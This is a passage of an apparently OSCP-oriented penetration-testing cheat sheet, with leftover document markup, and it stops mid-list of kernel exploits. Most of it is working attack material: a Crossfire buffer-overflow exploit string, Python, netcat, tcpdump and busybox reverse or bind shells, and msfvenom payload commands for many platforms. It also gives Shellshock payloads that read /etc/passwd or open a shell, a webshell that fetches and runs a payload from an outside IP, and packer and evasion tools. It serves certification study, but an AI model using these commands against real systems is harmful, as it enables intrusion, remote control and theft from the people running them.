/usr/games/crossfire/bin/crossfire<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>ESP register points toward the end of our CBuffer<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>add eax,12<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>jmp eax<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>83C00C add eax,byte +0xc<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>FFE0 jmp eax<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Check for “Bad Characters” Process of elimination - Run multiple<text:line-break/><text:s text:c="8"/>times 0x00 - 0xFF<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Find JMP ESP address<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>"\\x97\\x45\\x13\\x08" \# Found at Address 08134597<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" +<text:line-break/><text:s text:c="8"/>"\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b<text:line-break/><text:s text:c="8"/>"\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Connect to the shell with netcat:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>nc -v $ip 4444<text:line-break/><text:s text:c="8"/><text:line-break/>Shells<text:line-break/>===================================================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>Netcat Shell Listener<text:s text:c="2"/><text:line-break/><text:line-break/><text:s text:c="4"/>`nc -nlvp 4444`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Spawning a TTY Shell - Break out of Jail or limited shell<text:line-break/><text:s text:c="9"/>You should almost always upgrade your shell after taking control of an apache or www user.<text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="8"/>(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>(hint: sudo -l to see what you can run)<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="5"/>-<text:s text:c="3"/>You may encounter limited shells that use rbash and only allow you to execute a single command per session.<text:line-break/><text:s text:c="9"/>You can overcome this by executing an SSH shell to your localhost:<text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="15"/>ssh user@$ip nc $localip 4444 -e /bin/sh<text:line-break/><text:s text:c="15"/>enter user's password<text:line-break/><text:s text:c="15"/>python -c 'import pty; pty.spawn("/bin/sh")'<text:line-break/><text:s text:c="15"/>export TERM=linux<text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="6"/>`python -c 'import pty; pty.spawn("/bin/sh")'`<text:line-break/><text:line-break/><text:s text:c="15"/>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);<text:s text:c="10"/>s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'<text:line-break/><text:line-break/><text:s text:c="6"/>`echo os.system('/bin/bash')`<text:line-break/><text:line-break/><text:s text:c="6"/>`/bin/sh -i`<text:line-break/><text:line-break/><text:s text:c="6"/>`perl —e 'exec "/bin/sh";'`<text:line-break/><text:line-break/><text:s text:c="6"/>perl: `exec "/bin/sh";`<text:line-break/><text:line-break/><text:s text:c="6"/>ruby: `exec "/bin/sh"`<text:line-break/><text:line-break/><text:s text:c="6"/>lua: `os.execute('/bin/sh')`<text:line-break/><text:line-break/><text:s text:c="6"/>From within IRB: `exec "/bin/sh"`<text:line-break/><text:line-break/><text:line-break/><text:s text:c="6"/>From within vi: `:!bash`<text:line-break/><text:s text:c="5"/>or<text:line-break/><text:s text:c="5"/><text:line-break/><text:s text:c="6"/>`:set shell=/bin/bash:shell`<text:line-break/><text:s text:c="5"/><text:line-break/><text:s text:c="6"/>From within vim `':!bash':`<text:line-break/><text:line-break/><text:s text:c="6"/>From within nmap: `!sh`<text:line-break/><text:line-break/><text:s text:c="6"/>From within tcpdump<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="9"/>echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ &gt; /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root<text:line-break/><text:line-break/><text:s text:c="6"/>From busybox<text:s text:c="2"/>`/bin/busybox telnetd -|/bin/sh -p9999`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Pen test monkey PHP reverse shell<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[http://pentestmonkey.net/tools/web-shells/php-reverse-shel](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)<text:line-break/><text:line-break/>-<text:s text:c="3"/>php-findsock-shell - turns PHP port 80 into an interactive shell<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Perl Reverse Shell<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)<text:line-break/><text:line-break/>-<text:s text:c="3"/>PHP powered web browser Shell b374k with file upload etc.<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[https://github.com/b374k/b374k](https://github.com/b374k/b374k)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell <text:line-break/><text:s text:c="4"/>https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1<text:line-break/><text:s text:c="4"/><text:line-break/>-<text:s text:c="3"/>Web Backdoors from Fuzzdb <text:line-break/><text:s text:c="4"/>https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors<text:line-break/><text:line-break/>-<text:s text:c="3"/>Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*Linux*<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f elf &gt; shell.elf`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*Windows*<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>`msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f exe &gt; shell.exe`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*Mac*<text:line-break/><text:line-break/><text:s text:c="6"/>`msfvenom -p osx/x86/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f macho &gt; shell.macho`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>**Web Payloads**<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*PHP*<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>`msfvenom -p php/reverse_php LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.php`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>OR<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>`msfvenom -p php/meterpreter_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.php`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>Then we need to add the &lt;?php at the first line of the file so that it will execute as a PHP webpage:<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>`cat shell.php | pbcopy &amp;&amp; echo '&lt;?php ' | tr -d '\n' &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*ASP*<text:line-break/><text:line-break/><text:s text:c="6"/>`msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f asp &gt; shell.asp`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*JSP*<text:line-break/><text:line-break/><text:s text:c="6"/>`msfvenom -p java/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.jsp`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*WAR*<text:line-break/><text:line-break/><text:s text:c="6"/>`msfvenom -p java/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f war &gt; shell.war`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>**Scripting Payloads**<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*Python*<text:line-break/><text:line-break/><text:s text:c="6"/>`msfvenom -p cmd/unix/reverse_python LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.py`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*Bash*<text:line-break/><text:line-break/><text:s text:c="6"/>`msfvenom -p cmd/unix/reverse_bash LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.sh`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*Perl*<text:line-break/><text:line-break/><text:s text:c="6"/>`msfvenom -p cmd/unix/reverse_perl LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.pl`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>**Shellcode**<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.<text:line-break/><text:line-break/><text:s text:c="6"/>*Linux Based Shellcode*<text:line-break/><text:line-break/><text:s text:c="6"/>`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f &lt;language&gt;`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*Windows Based Shellcode*<text:line-break/><text:line-break/><text:s text:c="6"/>`msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f &lt;language&gt;`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>*Mac Based Shellcode*<text:line-break/><text:line-break/><text:s text:c="6"/>`msfvenom -p osx/x86/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f &lt;language&gt;`<text:line-break/><text:line-break/><text:s text:c="6"/>**Handlers**<text:line-break/><text:s text:c="6"/>Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.<text:line-break/><text:line-break/><text:s text:c="9"/>use exploit/multi/handler<text:line-break/><text:s text:c="9"/>set PAYLOAD &lt;Payload name&gt;<text:line-break/><text:s text:c="9"/>set LHOST &lt;LHOST value&gt;<text:line-break/><text:s text:c="9"/>set LPORT &lt;LPORT value&gt;<text:line-break/><text:s text:c="9"/>set ExitOnSession false<text:line-break/><text:s text:c="9"/>exploit -j -z<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘<text:line-break/><text:line-break/>-<text:s text:c="3"/>SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/<text:line-break/><text:line-break/><text:s text:c="9"/>use auxiliary/scanner/ssh/ssh_login<text:line-break/><text:s text:c="9"/>use post/multi/manage/shell_to_meterpreter<text:line-break/><text:line-break/>-<text:s text:c="3"/>Shellshock<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Testing for shell shock with NMap<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>`root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>git clone https://github.com/nccgroup/shocker<text:line-break/><text:line-break/><text:s text:c="4"/>`./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Shell Shock SSH Forced Command<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>Check for forced command by enabling all debug output with ssh<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="14"/>ssh -vvv<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>ssh -i noob noob@$ip '() { :;}; /bin/bash'<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>cat file (view file contents)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="14"/>echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(&lt;/etc/passwd)\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Shell Shock run bind shell<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="13"/>echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80<text:line-break/><text:line-break/>File Transfers<text:line-break/>============================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>Post exploitation refers to the actions performed by an attacker,<text:line-break/><text:s text:c="4"/>once some level of control has been gained on his target.<text:line-break/><text:line-break/>-<text:s text:c="3"/>Simple Local Web Servers<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Run a basic http server, great for serving up shells etc<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>python -m SimpleHTTPServer 80<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Run a basic Python3 http server, great for serving up shells<text:line-break/><text:s text:c="8"/>etc<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>python3 -m http.server<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Run a ruby webrick basic http server<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>ruby -rwebrick -e "WEBrick::HTTPServer.new<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>(:Port =&gt; 80, :DocumentRoot =&gt; Dir.pwd).start"<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Run a basic PHP http server<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>php -S $ip:80<text:line-break/><text:line-break/>-<text:s text:c="3"/>Creating a wget VB Script on Windows:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows file transfer script that can be pasted to the command line.<text:s text:c="2"/>File transfers to a Windows machine can be tricky without a Meterpreter shell.<text:s text:c="2"/>The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):<text:line-break/><text:line-break/><text:s text:c="9"/>echo Set args = Wscript.Arguments<text:s text:c="2"/>&gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo Url = "http://1.1.1.1/windows-privesc-check2.exe"<text:s text:c="2"/>&gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")<text:s text:c="2"/>&gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo dim bStrm: Set bStrm = createobject("Adodb.Stream")<text:s text:c="2"/>&gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo xHttp.Open "GET", Url, False<text:s text:c="2"/>&gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo xHttp.Send<text:s text:c="2"/>&gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo with bStrm<text:s text:c="6"/>&gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo <text:tab/>.type = 1 '<text:s text:c="6"/>&gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo <text:tab/>.open<text:s text:c="6"/>&gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo <text:tab/>.write xHttp.responseBody<text:s text:c="6"/>&gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo <text:tab/>.savetofile "C:\temp\windows-privesc-check2.exe", 2 '<text:s text:c="2"/>&gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo end with &gt;&gt; webdl.vbs<text:line-break/><text:s text:c="9"/>timeout 1<text:line-break/><text:s text:c="9"/>echo<text:line-break/><text:line-break/><text:s text:c="6"/>The file can be run using the following syntax:<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>`C:\temp\cscript.exe webdl.vbs`<text:line-break/><text:s text:c="6"/><text:line-break/>-<text:s text:c="3"/>Mounting File Shares<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Mount NFS share to /mnt/nfs<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>mount $ip:/vol/share /mnt/nfs<text:line-break/><text:line-break/>-<text:s text:c="3"/>HTTP Put<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>nmap -p80 $ip --script http-put --script-args<text:line-break/><text:s text:c="4"/>http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php<text:line-break/><text:line-break/>-<text:s text:c="3"/>Uploading Files<text:line-break/><text:s text:c="4"/>-------------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>SCP<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>scp localfile username@$ip:~/Folder/<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~<text:line-break/><text:s text:c="8"/><text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`davtest -move -sendbd auto -url http://$ip`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="8"/>https://github.com/cldrn/davtest<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>You can also upload a file using the PUT method with the curl command:<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`curl -T 'leetshellz.txt' 'http://$ip'`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>And rename it to an executable file using the MOVE method with the curl command:<text:line-break/><text:line-break/><text:s text:c="8"/>`curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Upload shell using limited php shell cmd<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>use the webshell to download and execute the meterpreter<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>\[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O<text:line-break/><text:s text:c="8"/>/tmp/evil" http://$ip/files/sh.php<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>\[curl -s --data "cmd=chmod 777 /tmp/evil"<text:line-break/><text:s text:c="8"/>http://$ip/files/sh.php<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>TFTP<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>mkdir /tftp<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>atftpd --daemon --port 69 /tftp<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>cp /usr/share/windows-binaries/nc.exe /tftp/<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>EX. FROM WINDOWS HOST:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>C:\\Users\\Offsec&gt;tftp -i $ip get nc.exe<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>FTP<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>apt-get update &amp;&amp; apt-get install pure-ftpd<text:s text:c="2"/><text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="8"/>\#!/bin/bash<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>groupadd ftpgroup<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>useradd -g ftpgroup -d /dev/null -s /etc ftpuser<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>pure-pw useradd offsec -u ftpuser -d /ftphome<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>pure-pw mkdb<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>cd /etc/pure-ftpd/auth/<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>ln -s ../conf/PureDB 60pdb<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>mkdir -p /ftphome<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>chown -R ftpuser:ftpgroup /ftphome/<text:s text:c="2"/><text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="8"/>/etc/init.d/pure-ftpd restart<text:line-break/><text:line-break/>-<text:s text:c="3"/>Packing Files<text:line-break/><text:s text:c="4"/>-------------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Ultimate Packer for eXecutables<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>upx -9 nc.exe<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>exe2bat - Converts EXE to a text file that can be copied and<text:line-break/><text:s text:c="8"/>pasted<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>locate exe2bat<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>wine exe2bat.exe nc.exe nc.txt<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Veil - Evasion Framework -<text:line-break/><text:s text:c="8"/>https://github.com/Veil-Framework/Veil-Evasion<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>apt-get -y install git<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>git clone https://github.com/Veil-Framework/Veil-Evasion.git<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>cd Veil-Evasion/<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>cd setup<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>setup.sh -c<text:line-break/><text:line-break/>Privilege Escalation<text:line-break/>==================================================================================================================<text:line-break/><text:line-break/>*Password reuse is your friend.<text:s text:c="2"/>The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.*<text:line-break/><text:line-break/><text:line-break/>-<text:s text:c="3"/>Linux Privilege Escalation<text:line-break/><text:s text:c="4"/>------------------------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/>-<text:s text:c="3"/>Defacto Linux Privilege Escalation Guide<text:s text:c="2"/>- A much more through guide for linux enumeration:<text:line-break/><text:s text:c="4"/>[https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Try the obvious - Maybe the user can sudo to root:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>`sudo su`<text:line-break/><text:s text:c="4"/><text:line-break/>-<text:s text:c="3"/>Here are the commands I have learned to use to perform linux enumeration and privledge escalation:<text:line-break/><text:line-break/><text:s text:c="4"/>What services are running as root?:<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>`ps aux | grep root`<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>What files run as root / SUID / GUID?:<text:line-break/><text:line-break/><text:s text:c="9"/>find / -perm +2000 -user root -type f -print<text:line-break/><text:s text:c="9"/>find / -perm -1000 -type d 2&gt;/dev/null<text:s text:c="3"/># Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.<text:line-break/><text:s text:c="9"/>find / -perm -g=s -type f 2&gt;/dev/null<text:s text:c="4"/># SGID (chmod 2000) - run as the group, not the user who started it.<text:line-break/><text:s text:c="9"/>find / -perm -u=s -type f 2&gt;/dev/null<text:s text:c="4"/># SUID (chmod 4000) - run as the owner, not the user who started it.<text:line-break/><text:s text:c="9"/>find / -perm -g=s -o -perm -u=s -type f 2&gt;/dev/null<text:s text:c="4"/># SGID or SUID<text:line-break/><text:s text:c="9"/>for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2&gt;/dev/null; done<text:s text:c="2"/><text:line-break/><text:s text:c="9"/>find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2&gt;/dev/null<text:line-break/><text:line-break/><text:s text:c="4"/>What folders are world writeable?:<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="9"/>find / -writable -type d 2&gt;/dev/null<text:s text:c="6"/># world-writeable folders<text:line-break/><text:s text:c="9"/>find / -perm -222 -type d 2&gt;/dev/null<text:s text:c="5"/># world-writeable folders<text:line-break/><text:s text:c="9"/>find / -perm -o w -type d 2&gt;/dev/null<text:s text:c="5"/># world-writeable folders<text:line-break/><text:s text:c="9"/>find / -perm -o x -type d 2&gt;/dev/null<text:s text:c="5"/># world-executable folders<text:line-break/><text:s text:c="9"/>find / \( -perm -o w -perm -o x \) -type d 2&gt;/dev/null<text:s text:c="3"/># world-writeable &amp; executable folders<text:line-break/><text:s text:c="4"/><text:line-break/>-<text:s text:c="3"/>There are a few scripts that can automate the linux enumeration process:<text:line-break/><text:line-break/><text:s text:c="6"/>- Google is my favorite Linux Kernel exploitation search tool.<text:s text:c="2"/>Many of these automated checkers are missing important kernel exploits which can create a very frustrating blindspot during your OSCP course.<text:line-break/><text:line-break/><text:s text:c="6"/>- LinuxPrivChecker.py - My favorite automated linux priv enumeration checker - <text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="9"/>[https://www.securitysift.com/download/linuxprivchecker.py](https://www.securitysift.com/download/linuxprivchecker.py)<text:line-break/><text:line-break/><text:s text:c="6"/>- LinEnum - (Recently Updated)<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>[https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>- linux-exploit-suggester (Recently Updated)<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>[https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>-<text:s text:c="3"/>Highon.coffee Linux Local Enum - Great enumeration script!<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="10"/>`wget https://highon.coffee/downloads/linux-local-enum.sh`<text:line-break/><text:line-break/><text:s text:c="6"/>-<text:s text:c="3"/>Linux Privilege Exploit Suggester<text:s text:c="2"/>(Old has not been updated in years)<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="4"/>[https://github.com/PenturaLabs/Linux\_Exploit\_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester)<text:line-break/><text:line-break/><text:s text:c="6"/>-<text:s text:c="3"/>Linux post exploitation enumeration and exploit checking tools<text:s text:c="2"/><text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="4"/>[https://github.com/reider-roque/linpostexp](https://github.com/reider-roque/linpostexp)<text:line-break/><text:s text:c="4"/><text:line-break/><text:line-break/>Handy Kernel Exploits<text:line-break/><text:line-break/>-<text:s text:c="3"/>CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel &lt; 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)<text:line-break/><text:line-break/><text:s 